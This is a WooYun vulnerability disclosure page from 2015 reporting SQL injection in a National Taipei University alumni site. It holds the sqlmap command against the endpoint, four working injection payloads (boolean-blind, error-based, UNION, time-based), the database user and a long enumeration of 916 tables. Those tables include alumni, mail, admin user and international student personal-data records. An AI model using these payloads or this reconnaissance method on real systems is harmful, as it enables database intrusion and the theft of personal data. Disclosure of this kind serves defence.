当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155823

漏洞标题:台湾國立臺北大學某处存在SQL注射漏洞(臺灣地區)

相关厂商:国立台北大学

漏洞作者: 路人甲

提交时间:2015-11-25 15:48

修复时间:2016-01-11 23:42

公开时间:2016-01-11 23:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

台湾國立臺北大學某处存在SQL注射
当前库包含900+表

详细说明:

sqlmap -u "http://**.**.**.**/ntpuhistory/Alumni/" --data=term=10


除了这一处,还有多处sql注入漏洞。
网站资料管理中心后台可登陆

1.png

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: term
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: term=10 AND 6212=6212
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: term=10 AND (SELECT 6576 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (CASE WHEN (6576=6576) THEN 1 ELSE 0 END)),0x716b6c7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (95) - 25 columns
Payload: term=10 UNION ALL SELECT CONCAT(0x7162786a71,0x69434f786773544c755a,0x716b6c7371),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: term=10 AND SLEEP(5)
---
[16:16:53] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 4.4.7
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'fansio'@'localhost'
Database: ntpudb
[916 tables]
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| tbl_a9_5_mail_log | 80838 |
| tbl_a9_5_mail_0 | 67319 |
| tbl_a12_stmd | 64264 |
| tbl_a12_stmd_2012_0613 | 64264 |
| tbl_a12_alumni | 63875 |
| tbl_a12_alumni_bk | 63862 |
| tbl_a9_5_mail_1 | 45574 |
| tbl_announce | 17053 |
| tbl_admin_role | 16503 |
| tbl_announce_bk | 13983 |
| tbl_a9_5_mail_2 | 12056 |
| COLUMNS | 8206 |
| tbl_a9_5_eod | 5477 |
| tbl_event | 4445 |
| tbl_a8_2_motionpic | 4288 |
| tbl_hr1 | 3923 |
| tbl_a7_announce | 3664 |
| tbl_a3_alumnidb | 3588 |
| tbl_event_bk | 3351 |
| tbl_a8_2_ntpustar1 | 3315 |
| tbl_eval_data_o | 2874 |
| tbl_e9_read_authority | 2823 |
| tbl_eval_tmdata | 2779 |
| tbl_a8_2_ntpustar | 2649 |
| tbl_a10_photo | 2524 |
| tbl_eval_data | 2447 |
| tbl_a14_acad_log | 2283 |
| tbl_a8_2_announce | 2009 |
| tbl_a8_4_announce | 1952 |
| tbl_a9_announce | 1938 |
| tbl_a4_announce | 1710 |
| tbl_a8_2_photo | 1628 |
| tbl_a14_announce | 1579 |
| tbl_eval_class_data | 1447 |
| tbl_a7_2_leave | 1437 |
| tbl_a8_3_announce | 1427 |
| tbl_eval_class_data_o | 1417 |
| tbl_e9_announce | 1341 |
| tbl_excel_announce_100 | 1240 |
| tbl_a7_4_announce | 1200 |
| tbl_law | 1057 |
| tbl_a7_4_public_article | 1020 |
| tbl_a8_announce | 990 |
| tbl_a8_3_rand | 986 |
| tbl_a7_1_is_admin_ref | 965 |
| tbl_a7_interstud_print | 953 |
| tbl_a7_4_epmail | 949 |
| tbl_a14_3_announce | 941 |
| tbl_a3_money | 927 |
| tbl_law_backup | 919 |
| tbl_a14_2_announce | 894 |
| tbl_excel_activity_action_100 | 894 |
| tbl_excel_activity_action_102 | 891 |
| tbl_excel_activity_action_bk | 891 |
| tbl_a10_announce | 862 |
| tbl_law_2012_0910 | 862 |
| tbl_hr | 822 |
| tbl_a3_history | 763 |
| tbl_a7_1_is_student_form | 750 |
| tbl_a8_6_announce | 742 |
| tbl_a3_1_announce | 726 |
| tbl_a8_9_announce | 708 |
| tbl_eannounce | 707 |
| tbl_admin_log | 689 |
| tbl_a8_3_announce_backup | 682 |
| tbl_a3_exchang | 669 |
| tbl_a9_2_announce | 659 |
| tbl_a12_alumniasso_committee | 644 |
| tbl_e2_announce | 644 |
| tbl_a14_1_announce | 632 |
| tbl_a6_announce | 628 |
| tbl_a7_2_announce | 614 |
| tbl_a8_1_announce | 593 |
| wp_postmeta | 593 |
| tbl_a8_4_scholarshipN | 586 |
| tbl_a8_9_photo | 580 |
| tbl_homepage_banner | 559 |
| tbl_a3_photo | 538 |
| tbl_a9_down | 536 |
| wp_posts | 535 |
| tbl_excel_announce_102 | 532 |
| tbl_excel_announce_bk | 532 |
| tbl_a8_5_announce | 527 |
| tbl_e5_announce | 518 |
| tbl_a7_interstud_personal_data_log | 513 |
| tbl_a3_exchang1 | 512 |
| tbl_epaper_mail | 492 |
| tbl_a12_announce | 488 |
| tbl_excel_announce_98 | 473 |
| tbl_a8_3_rand_2011 | 465 |
| tbl_a8_down | 446 |
| tbl_a7_1_is_student_form_org | 430 |
| tbl_a10_compete_award | 427 |
| tbl_exam_announce | 414 |
| tbl_a7_3_announce | 413 |
| tbl_a7_interstud_account | 411 |
| tbl_a8_7_announce | 409 |
| tbl_a11_1_announce | 400 |
| tbl_a4_hr_promote | 376 |
| tbl_a8_url | 356 |
| tbl_a3_con_motion | 346 |
| tbl_a9_1_announce | 341 |
| tbl_a11_announce | 336 |
| tbl_a7_4_epaper | 328 |
| tbl_e7_announce | 310 |
| tbl_a9_8_buyer | 299 |
| tbl_a7_interstud_personal_data | 290 |
| tbl_e10_join | 283 |
| tbl_a7_4_announce_org | 281 |
| wp_options | 281 |
| tbl_admin_user | 278 |
| tbl_a7_4_actphoto | 274 |
| tbl_a14_down | 273 |
| tbl_a7_interstud_family_data | 272 |
| tbl_excel_event | 271 |
| tbl_a7_down | 266 |
| tbl_historynews | 266 |
| tbl_a7_interstud_acad_bg | 262 |
| tbl_a7_interstud_lang | 258 |
| tbl_a7_interstud_other | 253 |
| tbl_excel_activity_action_98 | 252 |
| tbl_a7_interstud_countries | 250 |
| tbl_a7_trsfstud_countries | 250 |
| tbl_a7_interstud_acad_bg_log | 248 |
| tbl_a7_5_announce | 246 |
| tbl_a12_deptname | 238 |
| tbl_calendar | 236 |
| tbl_a12_dept_name | 231 |
| tbl_a3_meeting | 231 |
| tbl_a7_interstud_lang_log | 229 |
| tbl_a7_interstud_family_data_log | 227 |
| tbl_a3_people | 225 |
| tbl_e3_announce | 225 |
| tbl_e1_announce | 223 |
| tbl_a5_announce | 220 |
| tbl_a4_down | 218 |
| tbl_e4_announce | 217 |
| tbl_a5_statistics | 214 |
| tbl_a8_4_scholarship | 214 |
| tbl_a8_statdown | 195 |
| tbl_eservice | 194 |
| tbl_a3_webchk | 193 |
| tbl_a11_1_recruit_t2 | 190 |
| tbl_a7_excellence | 185 |
| vo_news | 181 |
| tbl_excel_announce | 178 |
| tbl_pdp_law | 173 |
| tbl_a8_8_announce | 172 |
| tbl_a3_tree | 171 |
| tbl_a7_3_recruit_t2 | 170 |
| tbl_a5_1_announce | 169 |
| tbl_a9_8_announce | 165 |
| tbl_a11_down | 161 |
| tbl_a5_down | 159 |
| tbl_a11_1_recruit_t1 | 147 |
| tbl_a9_7_announce | 147 |
| tbl_a6_disconnect | 142 |
| tbl_admin_group | 138 |
| tbl_admin_bar | 136 |
| tbl_a11_1_recruit_t3 | 133 |
| tbl_a3_alumni | 132 |
| tbl_enews | 130 |
| tbl_a14_2_coop | 126 |
| tbl_a7_statdown | 126 |
| tbl_e7_announce_org | 126 |
| tbl_a7_1_announce | 125 |
| tbl_historyteacher | 125 |
| tbl_e6_announce | 124 |
| tbl_a12_alumni_history | 120 |
| tbl_e7_potential | 119 |
| tbl_a7_3_recruit_t11 | 116 |
| tbl_e5_course_announce | 115 |
| tbl_a9_5_announce | 107 |
| tbl_a7_3_recruit_t1 | 106 |
| tbl_a9_4_announce | 106 |
| tbl_eval_tmp | 106 |
| tbl_eval_tmp_o | 106 |
| tbl_a9_3_announce | 103 |
| tbl_e9_down | 102 |
| tbl_a7_tecup | 101 |
| tbl_a6_photo | 99 |
| tbl_a8_4_career | 99 |
| tbl_excel_feedback | 99 |
| tbl_a3_1_exchang | 97 |
| tbl_a7_3_recruitstat | 97 |
| tbl_a8_down_class | 97 |
| tbl_a7_3_public_article | 93 |
| tbl_a1_speech | 91 |
| tbl_a1_speech_01 | 91 |
| tbl_a7_url | 91 |
| tbl_a8_announce_test | 90 |
| tbl_a8_9_dorm_member | 89 |
| tbl_a7_3_recruit_t3 | 88 |
| tbl_a9_3_officesupplies | 88 |
| tbl_a7_4_resourceintro | 87 |
| tbl_a8_2_group | 87 |
| tbl_e6_down | 86 |
| tbl_a4_sop | 84 |
| tbl_e10_announce | 84 |
| tbl_a9_down_class | 83 |
| tbl_excel_event_98 | 81 |
| tbl_a7_3_article | 79 |
| tbl_a11_2_announce_2012_0906 | 74 |
| tbl_a9_member | 74 |
| tbl_a8_3_award | 72 |
| tbl_a6_disconnect_mon | 70 |
| tbl_a7_1_recruitstat | 70 |
| wp_term_relationships | 70 |
| tbl_e9_announce_2012_0313 | 69 |
| tbl_a7_interstud_dept | 68 |
| tbl_a10_photo_class | 67 |
| tbl_a3_1_activity | 66 |
| tbl_a3_con | 65 |
| tbl_a3_con_class | 65 |
| tbl_a14_creative | 62 |
| tbl_a14_statdown | 59 |
| tbl_excel_activity_action | 58 |
| tbl_a11_1_statdown | 57 |
| tbl_a3_celebrate_2012_0925 | 57 |
| tbl_a8_4_anarpt | 56 |
| tbl_a7_1_is_pwd_forget | 55 |
| tbl_a8_9_dorm_club | 55 |
| tbl_excel_activity | 55 |
| wp_usermeta | 54 |
| tbl_a4_service | 53 |
| tbl_historycollegs | 53 |
| tbl_a3_evaluate_announce | 52 |
| tbl_a3_school | 52 |
| tbl_a8_member | 52 |
| tbl_a9_6_meeting | 52 |
| tbl_eval_class | 52 |
| tbl_eval_class_o | 52 |
| tbl_a8_9_active | 51 |
| tbl_a9_url | 51 |
| tbl_e5_course_url | 51 |
| tbl_a5_meeting | 50 |
| tbl_e10_research | 50 |
| tbl_excel_down | 49 |
| tbl_a14_1_announce1 | 48 |
| tbl_a14_2_down02 | 48 |
| tbl_a9_2_livelihood | 48 |
| tbl_a7_meeting | 47 |
| tbl_e9_faq | 47 |
| tbl_a9_5_faq | 46 |
| tbl_e2_exchange | 46 |
| tbl_excel_law | 46 |
| tbl_e4_1_fmember | 45 |
| tbl_e4_1_bmember | 44 |
| tbl_a8_url_class | 43 |
| tbl_a7_down_class | 42 |
| tbl_e7_url | 42 |
| tbl_a3_con_prerecord | 41 |
| tbl_a7_2_meeting | 41 |
| tbl_a7_6_announce | 40 |
| tbl_a9_2_rent | 40 |
| tbl_excel_announce_class | 40 |
| tbl_a11_down_class | 39 |
| tbl_a8_exam | 39 |
| tbl_count | 39 |
| tbl_a4_down_class | 38 |
| tbl_a11_1_workflow | 37 |
| tbl_a7_member | 37 |
| tbl_a8_3_sannounce | 37 |
| tbl_a10_down | 36 |
| tbl_a12_assolink | 36 |
| tbl_a8_9_dorm_club_class | 36 |
| tbl_a8_9_inter_photo | 36 |
| tbl_a8_9_photo_class | 36 |
| tbl_e7_teacher04 | 36 |
| tbl_a3_photo_class | 35 |
| tbl_a4_hrinfo | 35 |
| tbl_a8_2_candidate_ntpufilm | 35 |
| tbl_a9_2_place | 35 |
| tbl_e2_activity | 35 |
| tbl_a9_5_mail_3 | 34 |
| tbl_epaper | 34 |
| tbl_a11_member | 33 |
| tbl_a11_member_2012_0906 | 33 |
| tbl_a14_3_promotion | 33 |
| tbl_a14_url | 33 |
| tbl_a11_2_announce | 32 |
| tbl_a12_alumniasso_job | 32 |
| tbl_a3_announce | 32 |
| tbl_a5_url | 32 |
| tbl_a6_faq | 32 |
| tbl_e5_course_speech | 32 |
| training_news | 32 |
| tbl_a11_1_qna | 31 |
| tbl_a11_1_recruitstat | 31 |
| tbl_a12_down | 31 |
| tbl_a7_credit | 31 |
| tbl_a14_2_coop_class | 30 |
| tbl_a14_down_class | 30 |
| tbl_a3_con_prerecord_situation | 30 |
| tbl_a6_member | 30 |
| tbl_a7_4_epaper_class | 30 |
| tbl_e6_proj2 | 30 |
| tbl_a12_alumniasso_class | 29 |
| tbl_a14_2_student | 29 |
| tbl_a4_profevalue_list | 29 |
| tbl_e2_down | 29 |
| tbl_e7_courseb | 29 |
| tbl_e7_down | 29 |
| tbl_a14_3_plan | 28 |
| tbl_a3_building | 28 |
| tbl_a4_nhi2 | 28 |
| tbl_e9_down_class | 28 |
| tbl_a7_4_effect | 27 |
| tbl_a9_8_down01 | 27 |
| tbl_eval_group | 27 |
| tbl_eval_group_o | 27 |
| tbl_a11_2_down | 26 |
| tbl_a7_1_workflow | 26 |
| tbl_e7_coursem | 26 |
| tbl_a3_down | 25 |
| tbl_a6_manager | 25 |
| tbl_a8_5_rabies | 25 |
| tbl_a9_2_environment | 25 |
| tbl_a9_7_illegalparking | 25 |
| tbl_count_bk | 25 |
| tbl_e6_proj1 | 25 |
| tbl_a12_welfare | 24 |
| tbl_a5_example | 24 |
| tbl_a10_faq | 23 |
| tbl_a4_prof_rule | 23 |
| tbl_a4_read | 23 |
| tbl_a8_3_award1 | 23 |
| tbl_a8_3_stdbus | 23 |
| tbl_e2_course | 23 |
| tbl_excel_down_102 | 23 |
| tbl_excel_down_bk | 23 |
| tbl_a14_2_academic | 22 |
| tbl_a3_geea_message | 22 |
| tbl_a4_url | 22 |
| tbl_a6_down | 21 |
| tbl_a7_3_recruit_t4 | 21 |
| tbl_a8_9_faq | 21 |
| tbl_e2_aacsb_activity | 21 |
| tbl_a3_1_down | 20 |
| tbl_a3_celebrate_101 | 20 |
| tbl_a8_2_candidate | 20 |
| tbl_a8_7_tannounce | 20 |
| tbl_a9_url_class | 20 |
| tbl_exam_url_class | 20 |
| tbl_a5_control | 19 |
| tbl_a7_1_fna | 19 |
| tbl_a9_5_training | 19 |
| tbl_e7_teacher03 | 19 |
| tbl_e9_member | 19 |
| tbl_excel_member | 19 |
| tbl_a3_1_ddegree | 18 |
| tbl_a3_celebrate_class | 18 |
| tbl_a3_con_extempore | 18 |
| tbl_a3_home_banner | 18 |
| tbl_a5_eqpaper | 18 |
| tbl_a7_trsfstud_print | 18 |
| tbl_a9_1_buyer | 18 |
| tbl_a9_6_announce | 18 |
| tbl_new_info | 18 |
| tbl_a10_team | 17 |
| tbl_a11_1_leave | 17 |
| tbl_a3_division | 17 |
| tbl_a3_evaluate_url | 17 |
| tbl_a7_2_fna | 17 |
| tbl_a7_4_public_announce | 17 |
| tbl_e9_down_2 | 17 |
| tbl_historycontact | 17 |
| tbl_a11_2_workflow | 16 |
| tbl_a3_con_report | 16 |
| tbl_a5_member | 16 |
| tbl_a7_credit2 | 16 |
| tbl_a7_url_class | 16 |
| tbl_e2_aacsb_down | 16 |
| tbl_e2_url | 16 |
| tbl_excel_report | 16 |
| tbl_a10_member | 15 |
| tbl_a14_3_event | 15 |
| tbl_a14_announce_class | 15 |
| tbl_a7_credit3 | 15 |
| tbl_cpsh_url | 15 |
| tbl_a14_3_coop | 14 |
| tbl_a3_geea_law | 14 |
| tbl_a3_geea_teacher | 14 |
| tbl_a4_sop_class | 14 |
| tbl_a6_photo_class | 14 |
| tbl_a7_1_workflow_class | 14 |
| tbl_e6_history | 14 |
| tbl_e9_faq_class | 14 |
| tbl_excel_news | 14 |
| tbl_scholarship | 14 |
| wp_term_taxonomy | 14 |
| tbl_a14_url_class | 13 |
| tbl_a7_1_recruitstat_class | 13 |
| tbl_a7_3_recruitlink | 13 |
| tbl_a7_trsfstud_account | 13 |
| tbl_a8_3_stdbus_schedule | 13 |
| tbl_a8_4_info | 13 |
| tbl_e6_proj5 | 13 |
| tbl_new_info_class | 13 |
| wp_terms | 13 |
| tbl_a10_compete | 12 |
| tbl_a11_url | 12 |
| tbl_a14_member | 12 |
| tbl_a3_celebrate_class_2012_0925 | 12 |
| tbl_a3_geea_info | 12 |
| tbl_a7_3_journal | 12 |
| tbl_a7_3_public_journal | 12 |
| tbl_a7_3_recruit_class_t2 | 12 |
| tbl_a8_7_consultant | 12 |
| tbl_a8_7_timetable | 12 |
| tbl_a9_1_plant | 12 |
| tbl_a9_3_officesupplies_class | 12 |
| tbl_e2_course_class | 12 |
| tbl_e4_1_url | 12 |
| tbl_homepage_config | 12 |
| tbl_a12_down2 | 11 |
| tbl_a14_3_announce_class | 11 |
| tbl_a3_evaluate_member | 11 |
| tbl_a3_school_copy | 11 |
| tbl_a7_3_recruit_class_t3 | 11 |
| tbl_a7_4_public_journal | 11 |
| tbl_a8_4_download | 11 |
| tbl_a8_5_activity | 11 |
| tbl_a8_8_faq | 11 |
| tbl_pdp_type | 11 |
| tbl_a10_teacher | 10 |
| tbl_a11_1_recruit_class_t2 | 10 |
| tbl_a12_down_class | 10 |
| tbl_a3_url | 10 |
| tbl_a3_vedio | 10 |
| tbl_a4_profevalue_rule | 10 |
| tbl_a5_statistics_class | 10 |
| tbl_a7_3_recruit_class_t1 | 10 |
| tbl_a7_3_recruit_class_t11 | 10 |
| tbl_a7_calendar | 10 |
| tbl_a8_statdown_class | 10 |
| tbl_e10_member_02 | 10 |
| tbl_historynews_class | 10 |
| tbl_a14_1_announce_class | 9 |
| tbl_a14_statlist | 9 |
| tbl_a4_member | 9 |
| tbl_a4_url_class | 9 |
| tbl_a6_2_news | 9 |
| tbl_a7_2_workflow | 9 |
| tbl_a7_3_recruit_class_t12 | 9 |
| tbl_a7_3_recruit_class_t5 | 9 |
| tbl_a7_4_public_down | 9 |
| tbl_a7_4_todoor | 9 |
| tbl_a7_credit_class | 9 |
| tbl_a7_interstud_procedure | 9 |
| tbl_a7_tecdown | 9 |
| tbl_a7_trsfstud_dept | 9 |
| tbl_a7_trsfstud_procedure | 9 |
| tbl_a8_3_announce_military | 9 |
| tbl_a8_4_ucan | 9 |
| tbl_a8_5_rabies_class | 9 |
| tbl_a8_7_faq | 9 |
| tbl_a8_7_interior_class | 9 |
| tbl_calendar_class | 9 |
| tbl_e1_enews | 9 |
| tbl_e3_course_faculty | 9 |
| tbl_e7_potential_class | 9 |
| tbl_eevent | 9 |
| tbl_a11_1_recruit_class_t1 | 8 |
| tbl_a11_1_recruit_class_t3 | 8 |
| tbl_a14_2_announce_class | 8 |
| tbl_a3_1_member | 8 |
| tbl_a3_down_class | 8 |
| tbl_a3_member | 8 |
| tbl_a4_hrinfo_class | 8 |
| tbl_a4_service_class | 8 |
| tbl_a5_down_class | 8 |
| tbl_a6_down_class | 8 |
| tbl_a7_1_scores_other | 8 |
| tbl_a7_3_meeting_class | 8 |
| tbl_a7_3_public_announce | 8 |
| tbl_a7_4_resourcedoc | 8 |
| tbl_a8_4_career_class | 8 |
| tbl_a8_7_interior | 8 |
| tbl_a8_dep | 8 |
| tbl_e1_url | 8 |
| tbl_e3_down | 8 |
| tbl_e4_1_ajoc | 8 |
| tbl_e5_course_faculty | 8 |
| tbl_e6_proj4 | 8 |
| tbl_e7_courseb_class | 8 |
| tbl_a10_yrplan | 7 |
| tbl_a12_alumniasso_announce | 7 |
| tbl_a12_alumniasso_share | 7 |
| tbl_a12_alumniasso_url | 7 |
| tbl_a14_2_continent_class | 7 |
| tbl_a14_2_down02_class | 7 |
| tbl_a3_1_announce_class | 7 |
| tbl_a3_1_ddegree_class | 7 |
| tbl_a4_workflow | 7 |
| tbl_a5_statdown_class | 7 |
| tbl_a6_faq_class | 7 |
| tbl_a7_1_is_admin_db | 7 |
| tbl_a7_3_public_down | 7 |
| tbl_a7_3_publicdown | 7 |
| tbl_a7_3_recruit_class_t9 | 7 |
| tbl_a7_3_recruit_t7 | 7 |
| tbl_a7_3_recruit_t9 | 7 |
| tbl_a8_2_group_class | 7 |
| tbl_a8_3_announce_graduation | 7 |
| tbl_a8_3_award3 | 7 |
| tbl_a8_9_announce_event | 7 |
| tbl_a9_5_mail_class | 7 |
| tbl_a9_9_list | 7 |
| tbl_e7_down_class | 7 |
| tbl_hr_class | 7 |
| tbl_a11_1_recruit_class_t4 | 6 |
| tbl_a12_sponsor | 6 |
| tbl_a14_2_student1 | 6 |
| tbl_a3_ppt | 6 |
| tbl_a4_prof_moreinfo | 6 |
| tbl_a5_control_class | 6 |
| tbl_a6_url | 6 |
| tbl_a7_1_is_col_bachelor | 6 |
| tbl_a7_1_is_col_master | 6 |
| tbl_a7_1_is_col_phd | 6 |
| tbl_a7_3_recruitstat_class | 6 |
| tbl_a7_4_resourceintro_class | 6 |
| tbl_a7_interstud_college | 6 |
| tbl_a7_statdown_class | 6 |
| tbl_a7_tecdowno | 6 |
| tbl_a7_tecup_class | 6 |
| tbl_a7_trsfstud_college | 6 |
| tbl_a7_trsfstud_personal_data_log | 6 |
| tbl_a8_9_inter_photo_class | 6 |
| tbl_a9_2_place_class | 6 |
| tbl_a9_5_file_down_2 | 6 |
| tbl_a9_5_file_down_3 | 6 |
| tbl_a9_6_meeting_class | 6 |
| tbl_a9_6_space | 6 |
| tbl_a9_7_sop | 6 |
| tbl_a9_8_down01_class | 6 |
| tbl_announce_test | 6 |
| tbl_e10_commit | 6 |
| tbl_e3_announce_class | 6 |
| tbl_e6_announce_class | 6 |
| tbl_e6_calendar | 6 |
| tbl_e7_coursem_class | 6 |
| tbl_epaper_at | 6 |
| tbl_exam_url | 6 |
| tbl_excel_law_class | 6 |
| tbl_spotnews | 6 |
| tbl_a10_down_class | 5 |
| tbl_a10_faq_class | 5 |
| tbl_a12_advertise | 5 |
| tbl_a12_member | 5 |
| tbl_a12_sponsor_class | 5 |
| tbl_a3_evaluate_down_class | 5 |
| tbl_a3_geea_course | 5 |
| tbl_a3_meeting_class | 5 |
| tbl_a4_training | 5 |
| tbl_a7_1_recruitnews | 5 |
| tbl_a7_3_public_order | 5 |
| tbl_a7_3_recruit_class_t4 | 5 |
| tbl_a7_3_recruit_t17 | 5 |
| tbl_a8_3_award1_1 | 5 |
| tbl_a8_6_scholarship | 5 |
| tbl_a8_9_faq_class | 5 |
| tbl_a9_statdown_class | 5 |
| tbl_e10_member | 5 |
| tbl_e10_member_01 | 5 |
| tbl_e12_announce | 5 |
| tbl_e2_aacsb_announce | 5 |
| tbl_e2_common_course | 5 |
| tbl_e2_url_class | 5 |
| tbl_e3_url | 5 |
| tbl_e4_1_gmember | 5 |
| tbl_e4_1_url_class | 5 |
| tbl_e6_down_class | 5 |
| tbl_e7_coursef | 5 |
| tbl_e7_teacher02 | 5 |
| tbl_e9_pageset | 5 |
| tbl_event_at | 5 |
| tbl_hr1_class | 5 |
| tbl_a11_1_recruit_t4 | 4 |
| tbl_a11_1_recruitstat_class | 4 |
| tbl_a11_2_consultant | 4 |
| tbl_a11_2_timetable | 4 |
| tbl_a11_url_class | 4 |
| tbl_a12_down2_class | 4 |
| tbl_a14_2_academic_class | 4 |
| tbl_a14_2_down01_class | 4 |
| tbl_a14_3_promotion_class | 4 |
| tbl_a3_geea_doc | 4 |
| tbl_a4_announce_class | 4 |
| tbl_a4_nhi2_class | 4 |
| tbl_a4_read_class | 4 |
| tbl_a4_training_class | 4 |
| tbl_a5_url_class | 4 |
| tbl_a7_1_recruit | 4 |
| tbl_a7_2_workflow_class | 4 |
| tbl_a7_3_recruit_t14 | 4 |
| tbl_a7_3_recruit_t15 | 4 |
| tbl_a7_4_effect_class | 4 |
| tbl_a7_4_public_order | 4 |
| tbl_a7_4_public_publication | 4 |
| tbl_a7_credit3_class | 4 |
| tbl_a7_excellence_class | 4 |
| tbl_a7_trsfstud_acad_bg | 4 |
| tbl_a7_trsfstud_family_data | 4 |
| tbl_a7_trsfstud_lang | 4 |
| tbl_a7_trsfstud_other | 4 |
| tbl_a7_trsfstud_personal_data | 4 |
| tbl_a8_4_survey | 4 |
| tbl_a8_9_inter_download | 4 |
| tbl_a8_announce_test2 | 4 |
| tbl_a9_5_faq_class | 4 |
| tbl_a9_statdown | 4 |
| tbl_e1_course1 | 4 |
| tbl_e2_aacsb_down_class | 4 |
| tbl_e5_course_url_class | 4 |
| tbl_e6_proj2_class | 4 |
| tbl_e6_proj3 | 4 |
| tbl_e7_announce_class | 4 |
| tbl_e7_coursef_class | 4 |
| tbl_e7_url_class | 4 |
| tbl_e9_down_2_class | 4 |
| tbl_e9_member_class | 4 |
| tbl_excel_down_class_bk | 4 |
| tbl_excel_report1 | 4 |
| tbl_speech_class | 4 |
| tbl_a10_compete_class | 3 |
| tbl_a10_team_class | 3 |
| tbl_a11_1_statdown_class | 3 |
| tbl_a11_2_down_class | 3 |
| tbl_a11_2_workflow_class | 3 |
| tbl_a12_alumni_card | 3 |
| tbl_a12_alumni_job | 3 |
| tbl_a12_alumniasso_activity | 3 |
| tbl_a12_assolink_class | 3 |
| tbl_a12_url | 3 |
| tbl_a12_url_class | 3 |
| tbl_a14_2_student_class | 3 |
| tbl_a14_3_plan_class | 3 |
| tbl_a14_statdown_class | 3 |
| tbl_a4_abroad | 3 |
| tbl_a4_abroad_class | 3 |
| tbl_a4_announce_1 | 3 |
| tbl_a4_hr_promote_class | 3 |
| tbl_a4_prof_reply | 3 |
| tbl_a5_eqpaper_class | 3 |
| tbl_a5_example_class | 3 |
| tbl_a6_2_news_class | 3 |
| tbl_a7_3_meeting | 3 |
| tbl_a7_3_recruit | 3 |
| tbl_a7_3_recruit_class_t13 | 3 |
| tbl_a7_3_recruit_class_t14 | 3 |
| tbl_a7_3_recruit_class_t17 | 3 |
| tbl_a7_3_recruit_t5 | 3 |
| tbl_a7_4_event_class | 3 |
| tbl_a7_4_resourcedoc_class | 3 |
| tbl_a7_credit2_class | 3 |
| tbl_a7_credit3_bk | 3 |
| tbl_a7_interstud_degree | 3 |
| tbl_a7_tecdown_class | 3 |
| tbl_a7_trsfstud_degree | 3 |
| tbl_a7_trsfstud_family_data_log | 3 |
| tbl_a8_2_announce_class | 3 |
| tbl_a8_4_anarpt_class | 3 |
| tbl_a8_4_scholarship_class | 3 |
| tbl_a8_7_tutor | 3 |
| tbl_a8_8_faq_class | 3 |
| tbl_a8_9_inter_download_class | 3 |
| tbl_a8_exam_class | 3 |
| tbl_a9_2_rent_class | 3 |
| tbl_a9_7_lab | 3 |
| tbl_a9_7_lab_class | 3 |
| tbl_a9_8_purchase_url | 3 |
| tbl_a9_9_member | 3 |
| tbl_a9_9_unit_class | 3 |
| tbl_a9_9_url | 3 |
| tbl_e10_url | 3 |
| tbl_e10_url_class | 3 |
| tbl_e1_studyaboard | 3 |
| tbl_e2_aacsb_event | 3 |
| tbl_e2_common_course_class | 3 |
| tbl_e2_down_class | 3 |
| tbl_e3_down_class | 3 |
| tbl_e4_1_announce | 3 |
| tbl_e4_1_bmember_class | 3 |
| tbl_e5_course_down_class | 3 |
| tbl_e6_calendar_class | 3 |
| tbl_e6_proj1_class | 3 |
| tbl_e6_url | 3 |
| tbl_e6_url_eng | 3 |
| tbl_e7_teacher05 | 3 |
| tbl_e9_announce_class | 3 |
| tbl_event_class | 3 |
| tbl_retireclub_announce | 3 |
| tbl_speech | 3 |
| tbl_a14_2_student1_class | 2 |
| tbl_a14_3_coop_class | 2 |
| tbl_a3_building_class | 2 |
| tbl_a3_division_class | 2 |
| tbl_a3_eventrace | 2 |
| tbl_a3_tree_class | 2 |
| tbl_a4_prof_detail | 2 |
| tbl_a4_workflow_class | 2 |
| tbl_a5_meeting_class | 2 |
| tbl_a7_1_is_open_term | 2 |
| tbl_a7_3_public_down_class | 2 |
| tbl_a7_3_publicdown_class | 2 |
| tbl_a7_3_recruit_class_t15 | 2 |
| tbl_a7_3_recruit_class_t8 | 2 |
| tbl_a7_3_recruit_t12 | 2 |
| tbl_a7_3_recruit_t13 | 2 |
| tbl_a7_3_recruitlink_class | 2 |
| tbl_a7_4_announce_class | 2 |
| tbl_a7_4_public_down_class | 2 |
| tbl_a7_interstud_admin | 2 |
| tbl_a7_interstud_config | 2 |
| tbl_a7_tecdowno_class | 2 |
| tbl_a7_trsfstud_acad_bg_log | 2 |
| tbl_a7_trsfstud_admin | 2 |
| tbl_a7_trsfstud_lang_log | 2 |
| tbl_a8_3_announce_military2 | 2 |
| tbl_a8_4_epaper | 2 |
| tbl_a8_4_excel_execution103 | 2 |
| tbl_a8_4_excel_execution103_class | 2 |
| tbl_a8_4_excel_execution104 | 2 |
| tbl_a8_4_excel_execution104_class | 2 |
| tbl_a8_4_excel_result_class | 2 |
| tbl_a8_4_ucan_class | 2 |
| tbl_a8_7_faq_class | 2 |
| tbl_a9_3_ur_announce | 2 |
| tbl_a9_5_eod_class | 2 |
| tbl_a9_5_file_down | 2 |
| tbl_a9_5_file_url | 2 |
| tbl_a9_5_file_url_class | 2 |
| tbl_a9_5_training_class | 2 |
| tbl_a9_7_sop_class | 2 |
| tbl_a9_8_purchase_tender | 2 |
| tbl_a9_9_com_class | 2 |
| tbl_a9_9_url_class | 2 |
| tbl_a9_9_user_class | 2 |
| tbl_admin_bar_bk | 2 |
| tbl_e1_course2 | 2 |
